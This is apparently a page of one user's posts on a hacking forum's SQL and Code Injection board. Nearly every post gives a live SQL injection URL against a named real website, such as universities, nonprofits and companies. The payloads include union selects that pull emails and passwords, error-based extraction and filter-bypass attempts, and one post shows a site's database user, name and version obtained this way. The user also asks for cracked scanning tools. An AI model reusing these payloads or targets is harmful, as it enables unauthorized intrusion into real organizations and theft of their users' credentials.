Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 83
1 year ago
annen
http://faucherbotanix.com/detail.php?id=-12 union all select 1,2,3,email,5,password from db110601_cai.users--+-
Forum: SQL and Code Injection
1 year ago
annen
Thanks all the same!
Forum: SQL and Code Injection
1 year ago
annen
Tables found: Departement,Horaire_employe,Jour,circulaires,employe,horaires,produits,semaine,slider no "users" table in current db. you'd find which db have the table "users"!
Forum: SQL and Code Injection
1 year ago
annen
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+ 5.5.17 but cann't get database() and version(),and cann't get column_name or table_name I have tried many methords to bypass ,but it doesn't work! Thanks for your kindness replay!
Forum: SQL and Code Injection
1 year ago
annen
http://www.urbannovember.org/conference/rst.php?op=about_rst&cf=2&id=31' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+- cann't have a valiable column.I know it can use blind ,but I want to know if UNION methord or error base methord can use or not .
Forum: SQL and Code Injection
1 year ago
annen
http://www.scnutrition.org/index.php?ax=view&id=119 union select1,2,3 500 server error ,when I use overflow methord it doesn't work! can you help me to bypass this? Thanks a lot!
Forum: SQL and Code Injection
1 year ago
annen
thanks!
Forum: SQL and Code Injection
1 year ago
annen
hard!
Forum: SQL and Code Injection
1 year ago
annen
name_const cant' get schema_name,but floor(rand(0)*2)can
Forum: SQL and Code Injection
1 year ago
annen
Thanks!
Forum: SQL and Code Injection
1 year ago
annen
Sorry, This is not a WAF ,but a SQLi myslq<4!
Forum: SQL and Code Injection
1 year ago
annen
http://www.nbcffc.com/zt_news/index.php?id=24 column number 3
Forum: SQL and Code Injection
1 year ago
annen
http://www.zug4you.ch/cms/file.php ?PHPSESSID=4afbd15e53033b39eb6fbeb04234dcb8 &id=24 unIoN SEleCT 1,2,3,4,5,6,7,8--+- I tried /*!*/、 /*!12345*/、URLencode、double URLencode、*、() but it didn't work! Please help me!
Forum: SQL and Code Injection
1 year ago
annen
http://www.aeaweb.org/articles.php?doi=10.1257/jel.50.1.51
Forum: SQL and Code Injection
1 year ago
annen
http://www.cbds.org.br/noticias.php?id=132 You have an error in your SQL syntax; http://www.cbds.org.br/noticias.php?id=132 or 1 GroUp by concat_ws(0x00,vesion(),floor(rand(0)*2)) having min(0) or 1--+- cann't work!
Forum: SQL and Code Injection
1 year ago
annen
Thanks! It filted "(" and ")" !
Forum: SQL and Code Injection
1 year ago
annen
dear thanggiangho how did you get it ?
Forum: SQL and Code Injection
1 year ago
annen
I need a SQL Injection Vulnerability scanner tools,because chineae SQL Injection Vulnerability scanner tools cann't scan string type,and my system is WIN7,so can you kindly recommend some free SQL Injection Vulnerability scanner tools or cracked SQL Injection Vulnerability scanner tools? thanks all of you!
Forum: SQL and Code Injection
1 year ago
annen
Blocked because of IPS attack An attack was detected, originating from your system. Please contact the system administrator. http://www.carpatiagroup.com/subsubcat.php?tip=id_subsubcat&id=61' aNd 12=12--+-true http://www.carpatiagroup.com/subsubcat.php?tip=id_subsubcat&id=61' aNd 12=122--+-error
Forum: SQL and Code Injection
1 year ago
annen
http://regphos.mbc.nctu.edu.tw/browse_kinase_detail.php?kinase=null' UNION SELECT 1,2,3,4,5,6,7,8,9,/*!12345VerSioN()*/,11,12--+-
Forum: SQL and Code Injection
1 year ago
annen
Thanks! error base can't work,but union can!
Forum: SQL and Code Injection
1 year ago
annen
I'm sorry! can you give me a link of sqlmap v8. or how can sqlmap v8 works?
Forum: SQL and Code Injection
1 year ago
annen
http://www.iveh.org/?id=25 http://www.iveh.org/?id=-25 SQL error
Forum: SQL and Code Injection
1 year ago
annen
http://epaper.ntu.edu.tw/view.php?id=2452 http://continue.austincc.edu/index/view.php?id=62211 Thanks a lot!
Forum: SQL and Code Injection
1 year ago
annen
I see ,Thanks!
Forum: SQL and Code Injection
1 year ago
annen
https://www.southernct.edu/search/directories/profile/?id=48952+or+1+group+by+concat_ws(0x00,version(),floor(rand(0)*2))+having+min(0)+or+1--+- version 5.0.5 cannt get database()
Forum: SQL and Code Injection
1 year ago
annen
www.magrabiyemen.com/contents.php?id=3+union+select+1,2,3,4-- 2,4 can be used www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--+- magrzcom_newdata@localhost : magrzcom_magrabi2 : 5.0.96-community just do it! get the table_namebook,booking,consultant_areaofexpertise,consultant_countrywork,consultant_language,consultant_
Forum: SQL and Code Injection
Pages: 123Next
Current Page: 1 of 3